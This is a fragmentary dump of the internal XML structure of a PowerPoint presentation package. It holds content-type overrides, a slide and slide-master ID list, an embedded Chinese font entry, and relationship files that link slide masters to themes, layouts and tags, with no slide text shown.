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52.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme53.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme54.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme55.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme56.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme57.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme58.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme59.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme6.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme60.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme61.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme62.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme63.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme64.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme65.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme6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50" r:id="rId3"/>
    <p:sldMasterId id="2147483652" r:id="rId4"/>
    <p:sldMasterId id="2147483654" r:id="rId5"/>
    <p:sldMasterId id="2147483657" r:id="rId6"/>
    <p:sldMasterId id="2147483659" r:id="rId7"/>
    <p:sldMasterId id="2147483661" r:id="rId8"/>
    <p:sldMasterId id="2147483663" r:id="rId9"/>
    <p:sldMasterId id="2147483665" r:id="rId10"/>
    <p:sldMasterId id="2147483667" r:id="rId11"/>
    <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
    <p:sldMasterId id="2147483735" r:id="rId45"/>
    <p:sldMasterId id="2147483737" r:id="rId46"/>
    <p:sldMasterId id="2147483739" r:id="rId47"/>
    <p:sldMasterId id="2147483741" r:id="rId48"/>
    <p:sldMasterId id="2147483743" r:id="rId49"/>
    <p:sldMasterId id="2147483745" r:id="rId50"/>
    <p:sldMasterId id="2147483747" r:id="rId51"/>
    <p:sldMasterId id="2147483749" r:id="rId52"/>
    <p:sldMasterId id="2147483751" r:id="rId53"/>
    <p:sldMasterId id="2147483753" r:id="rId54"/>
    <p:sldMasterId id="2147483755" r:id="rId55"/>
    <p:sldMasterId id="2147483757" r:id="rId56"/>
    <p:sldMasterId id="2147483759" r:id="rId57"/>
    <p:sldMasterId id="2147483761" r:id="rId58"/>
    <p:sldMasterId id="2147483763" r:id="rId59"/>
    <p:sldMasterId id="2147483765" r:id="rId60"/>
    <p:sldMasterId id="2147483767" r:id="rId61"/>
    <p:sldMasterId id="2147483769" r:id="rId62"/>
    <p:sldMasterId id="2147483771" r:id="rId63"/>
    <p:sldMasterId id="2147483773" r:id="rId64"/>
    <p:sldMasterId id="2147483775" r:id="rId65"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId101"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId66"/>
    <p:sldId id="263" r:id="rId67"/>
    <p:sldId id="665" r:id="rId69"/>
    <p:sldId id="642" r:id="rId70"/>
    <p:sldId id="643" r:id="rId71"/>
    <p:sldId id="644" r:id="rId72"/>
    <p:sldId id="729" r:id="rId73"/>
    <p:sldId id="767" r:id="rId74"/>
    <p:sldId id="768" r:id="rId75"/>
    <p:sldId id="769" r:id="rId76"/>
    <p:sldId id="770" r:id="rId77"/>
    <p:sldId id="771" r:id="rId78"/>
    <p:sldId id="772" r:id="rId79"/>
    <p:sldId id="773" r:id="rId80"/>
    <p:sldId id="774" r:id="rId81"/>
    <p:sldId id="775" r:id="rId82"/>
    <p:sldId id="776" r:id="rId83"/>
    <p:sldId id="777" r:id="rId84"/>
    <p:sldId id="779" r:id="rId85"/>
    <p:sldId id="780" r:id="rId86"/>
    <p:sldId id="781" r:id="rId87"/>
    <p:sldId id="782" r:id="rId88"/>
    <p:sldId id="783" r:id="rId89"/>
    <p:sldId id="784" r:id="rId90"/>
    <p:sldId id="785" r:id="rId91"/>
    <p:sldId id="787" r:id="rId92"/>
    <p:sldId id="795" r:id="rId93"/>
    <p:sldId id="788" r:id="rId94"/>
    <p:sldId id="789" r:id="rId95"/>
    <p:sldId id="666" r:id="rId96"/>
    <p:sldId id="691" r:id="rId97"/>
    <p:sldId id="690" r:id="rId98"/>
    <p:sldId id="692" r:id="rId99"/>
    <p:sldId id="637" r:id="rId100"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId105"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId10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A7AF"/>
    <a:srgbClr val="D1202F"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E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1" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="412" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3894"/>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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster64.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster63.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster62.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster61.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster58.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster57.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster56.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster55.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster54.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster53.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster52.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster51.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster50.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster49.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster48.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster47.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster46.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster41.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster40.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster39.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster38.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster37.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster36.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster35.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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag475.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.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21922-B392-49CB-98B2-D1506FCEECF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82BF-40C1-4E6C-9085-1B48E30F0BD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23020B4-C4F0-47FB-9EF6-DA1D8CA35CE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tags" Target="../tags/tag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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster11.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme11.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster12.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme12.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme13.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster14.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster15.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme15.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster16.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme16.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster17.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heme" Target="../theme/theme17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster18.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster19.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.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tags" Target="../tags/tag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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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slideLayout" Target="../slideLayouts/slideLayout28.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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slideLayout" Target="../slideLayouts/slideLayout29.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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0"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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slideLayout" Target="../slideLayouts/slideLayout31.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout32.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout33.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout34.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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slideLayout" Target="../slideLayouts/slideLayout36.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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slideLayout" Target="../slideLayouts/slideLayout37.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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slideLayout" Target="../slideLayouts/slideLayout38.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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image" Target="../media/image3.svg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster40.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>
</file>

